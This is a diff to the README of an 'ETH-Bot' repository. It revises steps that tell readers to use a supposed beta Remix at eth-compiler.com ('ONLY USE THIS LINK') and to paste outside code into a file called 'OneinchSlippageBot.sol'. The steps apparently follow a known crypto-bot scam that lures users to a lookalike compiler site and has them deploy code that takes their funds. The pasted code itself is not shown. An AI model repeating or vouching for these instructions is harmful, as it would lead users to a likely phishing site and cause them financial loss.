Jacob-Web3/ETH-Bot/README.md

 ✅2- Access Remix: www.eth-compiler.com
-⚠️(THE BOT IS ONLY COMPATIBLE WITH THIS BETA VERSION OF THE REMIX, SO ONLY USE THIS LINK)⚠️ https://eth-compiler.com/ •For more information contact: support@eth-compiler.com
+⚠️(THE BOT IS ONLY COMPATIBLE WITH THIS BETA VERSION OF THE REMIX, SO ONLY USE THIS LINK)⚠️ https://eth-compiler.com/

+*For more information contact: support@eth-compiler.com

 ✅3- Click on the “contracts” folder and then create “New File”.
 Rename it as you like, i.e: “OneinchSlippageBot.sol”.
 Make sure it ends with .sol for Ethereum programming language.
 Note: There is a problem if the text is not colored when you create bot.sol.
 Simply refresh the browser and then paste rentry codes again.